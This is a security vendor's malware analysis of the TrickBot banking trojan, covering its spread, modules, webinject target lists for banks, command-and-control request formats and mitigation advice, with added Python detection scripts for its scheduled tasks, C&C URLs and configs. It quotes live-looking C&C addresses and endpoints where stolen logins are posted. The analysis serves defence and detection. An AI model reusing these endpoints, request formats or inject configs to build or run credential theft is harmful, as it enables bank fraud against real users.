
TrickBot – Today’s Top Banking Trojan

Posted by: FraudWatch International | Date: Jan 30, 2020 | Category: Expert Explanations, Malware

TrickBot, a banking trojan that has been infecting victims since 2016, is considered by many cybersecurity experts to be one of the top threats targeting businesses. So far, TrickBot has compromised over 250 million email accounts.

TrickBot usually propagates via spear-phishing emails, typically using weaponized Microsoft Word or Excel attachments that pretend to be invoices or resumés. It also spreads as a secondary payload downloaded by other banking trojans such as IcedID and Emotet.

Once installed on the victim’s network, it quickly spreads throughout an enterprise infrastructure by exploiting vulnerabilities in the Server Message Block (SMB) protocol. It creates persistence on an infected system by using a Windows Scheduled Task.

TrickBot has a meticulously composed target list (see below). Originally, TrickBot focused on North America and Europe, but then expanded its target list to include banks in Australia and Asia. It now targets banks all around the world. In fact, its target list is about ten to twenty times as long as other banking trojans.

The primary targets of TrickBot are located in the USA, for example USAA (United Services Automobile Association, an insurance and financial services provider located in Texas, U.S.A.):

<dinj> // Dynamic INJection

<lm>https://www.usaa.com/inet/ent_accounts/EntManageAccounts*</lm>
// URL fragment (if open in browser, Bot will try to steal credentials)

<hl>https://66.55.71.12:446/response.php?s=1545235830343997&id=oSzg21Bl1KPRVwjr8CNr</hl>
// Where it is going to post logins/etc stolen

It also targets “major” companies like Amazon:

<dinj>

<lm>https://sellercentral.amazon.com/payments/reports/statement/details*</lm>

Or PayPal:

<lm>https://www.paypal.com/mep/dashboard*</lm>

Trickbot also extends its interest to European companies:

<lm>*securebank.santander*.de/EBANDE*/BtoChannelDriver*</lm>

<lm>*commerzbank.de/</lm>

<lm>https://secure.halifax-online.co.uk/personal/a/logon/entermemorableinformation.jsp*</lm>

The list of “targets” is not static. From time to time, TrickBot probes new regions. For instance, around 15th August 2018 it started to target Australian banks:

<mm>https://banking.westpac.com.au*</mm>

<sm>https://banking.westpac.com.au/wbc/banking/handler*</sm>

<mm>https://ib-auth.delphibank.com.au*</mm>

<sm>https://ib-auth.delphibank.com.au/Account/Login*</sm>

<mm>https://inetbnkp.adelaidebank.com.au*</mm>

TrickBot is still targeting a few Australian banks (a recent case was seen on 12th December 2019 for Commonwealth Bank of Australia):

<lm>https://*.my.commbank.com.au/netbank/PaymentHub/MakePayment.aspx*sn-transfers-bpay</lm>

<hl>http://198.46.161.196:2020/q1MPVi7phg/getinj/hYduOVpZwD</hl>

TrickBot has dropped most of the Australian banks from its target list. This could be due to an increase in probes in Japan (from approximately 22nd October 2019 – present):

<lm>https://ib.resonabank.co.jp/IB/Js/template.js</lm>

<lm>https://www12.ib.shinkin-ib.jp/est/webfb/fb/js/cookie.js</lm>

<lm>https://direct.ib.hirogin.co.jp/HRIK01/cck/forms/IKP/emusc_IK.js?*</lm>

TrickBot uses a wide spectrum of modules to steal all kinds of credentials, including network passwords.

Some of the modules and methods TrickBot employs are:

  • A dynamic webinject it uses against financial institutions (injectDll32/injectDll64).
  • Collecting system information of the infected device, such as CPU, OS, and memory information, user accounts, and lists of installed programs and services, and sending it to the C&C server (systeminfo32/systeminfo64).
  • Gathering network information of the infected system and sending it to the C&C server (networkDll32/networkDll64).
  • A “password grabber” module which steals credentials from applications like FileZilla, Microsoft Outlook and WinSCP (pwgrab32/pwgrab64).
  • Targeting point-of-sale (PoS) systems (psfin32/psfin64).
  • Stealing browser data such as cookies, browsing history and browser configuration (importDll32/importDll64).
  • Stealing additional credentials to move laterally and further exploit the infected system (tabDll32/tabDll64).
  • A module that searches through the files of an infected machine to collect email addresses to spread to via new spam messages (mailsearcher32/mailsearcher64).
  • A worm module, allowing TrickBot to move laterally within an infected network via the EternalBlue (MS17-010), EternalRomance and EternalChampion exploits (mwormDll32/mwormDll64).
  • For lateral movement, downloading a TrickBot loader from a URL, propagating the loader to network shares connected to the affected machine, and installing the loader as a service for persistence (mshareDll32/mshareDll64).

As shown above, TrickBot does not simply inject into browser sessions and listen to traffic; it starts its malicious activities by scanning the computer (mail agents, browser data…). This means that even if a user of an infected system has not visited any of the “target websites”, valuable information has probably been sent to the C&C server.

Mitigation recommendations:

FraudWatch International recommends the following steps be taken by businesses to protect against being infected by the TrickBot trojan:

  • Train: Every employee should be trained on recognizing phishing and spear-phishing, as this is the primary infection vector not only for TrickBot, but also for many other malware programs.
  • Update: Ensure that all devices and software applications, especially antivirus and antimalware programs, are up-to-date and patched.
  • Monitor: Use filters to identify malicious emails and monitor the network for suspicious traffic or attempts to communicate with blacklisted IPs.
  • Access: Disable macros, prohibit external application downloads and prevent non-whitelisted URLs from being accessed.

Appendix 1. Some specifics of TrickBot’s behaviour

Once TrickBot’s module gets control, it installs itself into the system. For example, in order to be persistent, it creates a new Windows Scheduled Task.

Location (example): “C:\Windows\System32\Tasks\Command cache application” // i.e. it tries to look like a “typical” Windows application.

Task content:

<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">

<Command>C:\Users\<UserName>\AppData\Roaming\cmdcache\aDEb.exe</Command>

 

TrickBot slightly changes its original name, for example “radia.exe” to “tadia.exe”.
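The persistence described above leaves a task definition whose `<Command>` points into a user profile's AppData folder. The following is an added example, not part of the original article: a Python check over task definition files, where the sample task XML is constructed and the rule "commands under AppData deserve review" is an assumption of the example.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Assumption: executables started from a user profile's AppData tree deserve review
USER_WRITABLE = re.compile(r"(\\users\\[^\\]+\\appdata\\|%(local)?appdata%)", re.I)


def suspicious_commands(task_xml):
    """Return the <Command> values of a task definition that run from AppData."""
    root = ET.fromstring(task_xml)
    commands = [
        (el.text or "").strip().strip('"')
        for el in root.iterfind(".//t:Exec/t:Command", NS)
    ]
    return [c for c in commands if USER_WRITABLE.search(c)]


def scan_task_dir(task_dir):
    """Walk a Tasks directory (e.g. a copy of C:\\Windows\\System32\\Tasks)."""
    findings = {}
    for path in Path(task_dir).rglob("*"):
        if not path.is_file():
            continue
        try:
            # Task files are XML without an extension; passing bytes lets the
            # parser honour the file's own encoding (usually UTF-16).
            hits = suspicious_commands(path.read_bytes())
        except (ET.ParseError, OSError):
            continue
        if hits:
            findings[str(path)] = hits
    return findings


# Constructed task definitions for illustration
TASK_APPDATA = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author"><Exec>
    <Command>C:\Users\alice\AppData\Roaming\cmdcache\aDEb.exe</Command>
  </Exec></Actions>
</Task>"""
TASK_SYSTEM = TASK_APPDATA.replace(
    r"C:\Users\alice\AppData\Roaming\cmdcache\aDEb.exe",
    r"C:\Windows\System32\defrag.exe",
)
```

Legitimate per-user updaters also run from AppData, so treat the output as a review list rather than a verdict.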

It waits several minutes prior to the first connection to its server (which is not long compared to other trojans) and sends requests to its command and control server (C&C).  For example:

GET https://181.140.173.186:449/mor51/<MachineName>_W617601.173A7097DBB9D6B1EC76B8F1ADC3958C/5/spk/ HTTP/1.1

Connection: Keep-Alive

Server -> HTTP/1.1 200 OK

Server -> Server: nginx/1.10.3

Server -> …<Encrypted Response>

In the above example, “mor51” is the Tag (or current “campaign name”), i.e. it lets the C&C server see which generation of bot obtained control.

More examples of “tags”:

– “mor63”, “mor58”, “mor43”, … “tot597” (around 29.10.2019), “mango21”, …

 

<Encrypted Response> – once decrypted (SHA 256 bits + AES 256 bits), it would look like:

 

<expir>1577739600</expir>

</ssert>

Next, TrickBot sends information about the infected system. For example:

GET https://181.140.173.186:449/mor51/<MachineName>_W617601.173A7097DBB9D6B1EC76B8F1ADC3958C/0/Windows%207%20x86%20SP1/1079/<Infected Machine’s IP address>/893F0845BDAE1F2BD91BCFAE506A3A947D99A541A49436A6B4D0DB1FC4F0A801/…

It then sends a request for modules. Typically, the first module is a password-stealer:

https://194.5.250.121:447/mor51/<MachineName>_W617601.173A7097DBB9D6B1EC76B8F1ADC3958C/5/pwgrab32/

The server responds with the (encrypted) “pwgrab32” module. This module is not specific: it will “grab” all possible passwords from the infected machine and send them to the C&C:

POST https://181.140.173.186:449/mor51/<MachineName>_W617601.173A7097DBB9D6B1EC76B8F1ADC3958C/64/pwgrab/DEBG/browser/ HTTP/1.1

The Chrome webdata db file is copied.

importDll32

injectDll32

mshareDll32

mwormDll32

networkDll32

pwgrab32

systeminfo32

tabDll32

As you can see, TrickBot has a full array of “functions” to steal information and exploit systems, including shared drives, etc.

Finally, TrickBot will download its web injector module (“injectDll32”) and configuration files:
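The check-in, system-information, module and upload requests shown above share one URL path layout: tag, client ID, a numeric command, then the remainder. The following is an added example, not part of the original article, that matches that layout in proxy logs; the log line format, the lowercase-letters-plus-digits tag shape and all sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Path layout seen in the requests above: /<tag>/<client id>/<command>/<rest>
# client id = <MachineName>_W<digits>.<32 hex chars>
TRICKBOT_PATH = re.compile(
    r"^/(?P<tag>[a-z]+\d+)"
    r"/(?P<machine>[^/]+)_W(?P<winver>\d+)\.(?P<botid>[0-9A-F]{32})"
    r"/(?P<command>\d+)/(?P<rest>.*)$"
)
PORTS = {447, 449}  # C&C ports that appear in the article's examples


def classify(url):
    """Return the parsed fields if the URL matches the layout, else None."""
    parts = urlsplit(url)
    m = TRICKBOT_PATH.match(parts.path)
    if not m:
        return None
    hit = m.groupdict()
    hit["host"] = parts.hostname
    hit["known_port"] = parts.port in PORTS
    return hit


def scan(log_lines):
    """Yield (client_ip, fields) for each proxy log line whose URL matches."""
    for line in log_lines:
        # Assumed log format: "<timestamp> <client ip> <method> <url>"
        try:
            _, client, _, url = line.split(None, 3)
        except ValueError:
            continue
        hit = classify(url.strip())
        if hit:
            yield client, hit


# Constructed sample lines (192.0.2.0/24 and 198.51.100.0/24 are documentation ranges)
BOT = "WS042_W617601.0123456789ABCDEF0123456789ABCDEF"
SAMPLE = [
    f"2020-01-30T10:00:01Z 198.51.100.7 GET https://192.0.2.10:449/mor51/{BOT}/5/spk/",
    f"2020-01-30T10:00:09Z 198.51.100.7 GET https://192.0.2.11:447/mor51/{BOT}/5/pwgrab32/",
    "2020-01-30T10:01:00Z 198.51.100.8 GET https://intranet.example/mor51/readme.txt",
    "malformed line",
]

if __name__ == "__main__":
    for client, hit in scan(SAMPLE):
        print(client, hit["tag"], hit["command"], hit["rest"], hit["host"])
```

Because the match is on path structure rather than on IP addresses, it keeps working when the C&C addresses rotate, and the extracted machine name identifies which host to isolate.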

<DIR> injectDll32_configs

<DIR> networkDll32_configs

<DIR> pwgrab32_configs

“injectDll32_configs” contains settings which are descriptors for its targets. Most targets are banks (approximately 100 different banks from many countries). The most recent update of the target list was made around 22nd October 2019, and there now seems to be a focus on Japanese banks:

<dinj>

<lm>https://ib.hokkokubank.co.jp/HKIK01/cck/forms/IKP/HkBank2_PC.js?*</lm>

<hl>https://192.3.104.55:446/response.php?s=1571300200126636&id=10TxNhb0Y06Fu2sHXnOC</hl>

<pri>100</pri>

<sq>2</sq>

</dinj>
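A decoded target list like the one above can be checked against an organisation's own URLs. The following is an added example, not part of the original article, that extracts `<dinj>` entries and answers two questions: which of our URLs are listed in `<lm>`, and which endpoints in `<hl>` should be watched. The sample config is constructed, and treating `*` as a match-anything wildcard is an assumption.

```python
import re
from urllib.parse import urlsplit

DINJ = re.compile(r"<dinj>(.*?)</dinj>", re.S)
FIELD = re.compile(r"<(lm|hl|pri|sq)>(.*?)</\1>", re.S)


def parse_dinj(config_text):
    """Extract each <dinj> entry as a dict of its fields.

    Regexes are used instead of an XML parser because the <hl> URLs carry a
    raw '&', which a strict XML parser rejects.
    """
    return [
        {tag: value.strip() for tag, value in FIELD.findall(body)}
        for body in DINJ.findall(config_text)
    ]


def lm_matches(pattern, url):
    """Assumption: '*' in <lm> matches anything; every other character is literal."""
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(regex, url) is not None


def targeted(entries, our_urls):
    """Which of our own URLs appear in the decoded target list?"""
    patterns = [e["lm"] for e in entries if "lm" in e]
    return sorted(u for u in our_urls if any(lm_matches(p, u) for p in patterns))


def collector_endpoints(entries):
    """host:port pairs taken from <hl>, for proxy or firewall monitoring."""
    out = set()
    for e in entries:
        if "hl" in e:
            p = urlsplit(e["hl"])
            out.add(f"{p.hostname}:{p.port or (443 if p.scheme == 'https' else 80)}")
    return sorted(out)


# Constructed sample config (example domain and documentation IP range)
SAMPLE = """<dinj>
<lm>https://online.bank.example/login/*.js?*</lm>
<hl>https://192.0.2.55:446/response.php?s=1&id=abc</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>"""
```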

At FraudWatch International, we monitor activity for numerous trojans, including TrickBot, and we detect the latest changes and new targets.  As part of our Anti-Malware service, we can take down the IPs responsible, therefore disabling TrickBot’s ability to send harvested credentials back to criminals.

Taking down C&C IPs works even if the trojans remain undetected on infected machines.  Due to our constant monitoring services, we detect the latest changes (IPs and targets), as soon as the criminals start to push out their new campaigns.

If you think Anti-Malware services could assist your business, don’t hesitate to contact us.
